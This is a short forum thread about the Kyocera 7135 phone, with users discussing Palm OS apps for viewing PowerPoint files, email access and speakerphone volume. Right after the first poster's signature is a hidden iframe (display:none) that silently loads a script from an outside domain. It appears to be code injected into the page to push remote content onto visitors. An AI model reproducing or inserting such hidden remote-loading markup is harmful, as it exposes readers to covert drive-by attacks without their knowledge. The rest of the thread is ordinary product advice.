+ Reply to Thread

7135 Capabilites

This phone just rocks... but I do think it can do a lot more. A verizon rep was telling me that you can download a powerpoint presentation to your phone and actually run it from the phone- does anyone know what app can do this?

Yahoo Mail/Hotmail... wasn;t there an app (tiny apps??) where you could access your hotmail or yahoo account from a palm with a wireless modem (omnisky modem)

Speakerphone louder?

Thanks!

Mark<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Editor and Site Administrator Convergent's Avatar
    For Powerpoint, here are some choices...

Edge Software - QuickofficePro
    Dataviz - Documents to Go
    Cerience - RepliGo
    ibrite - Powerviewer2000
    Mobipocket - Office Companion for PalmOS

For Yahoo and Hotmail...

Brightex - OneMail for Yahoo/Hotmail/MSN
    PDApps - Verichat
    Notify Technology - NotifyLink Internet Edition for Kyocera
    Gopher King - Personal Email
    Yahoo - Messenger for Palm (I'm not sure this works, its pretty old)

Speakerphone...

All reports are that the speakerphone works very well, so maybe you have a defective phone if yours isn't. I don't think there is anyway to increase the volume of the speakerphone other than the normal volume control for the phone.
    Mike - Been Converged?

Thanks Mike!

Do I need a SD USB device to transfer jpegs/mpegs to my SD card or is there a way to do it directly to the phone/

I appreciate your help while I am making this device the be-all-end-all...

ps- verizon got pretty upset that the Times Square office was selling the phone out of the warehouse before its official release date 4/28... I guess I got lucky.

Get VersaMail from Palm and then get the lastest and greatest of QuickOffice 7.0. I think its called QuickOffice Pre. Anyway. With that installed you can open any native office document from your email or saved to your phone.... JUST AWSOME!

Re: 7135 Capabilites

Originally posted by "maccam"

This phone just rocks... but I do think it can do a lot more. A verizon rep was telling me that you can download a powerpoint presentation to your phone and actually run it from the phone- does anyone know what app can do this?

Yahoo Mail/Hotmail... wasn;t there an app (tiny apps??) where you could access your hotmail or yahoo account from a palm with a wireless modem (omnisky modem)

Speakerphone louder?

Thanks!

Mark
    Margi's Presenter-to-go will allow you to run the PP presentations off of the 7135's SD slot straight to the projector. Check it out at www.margi.com . It can't do animations though, just straight slides.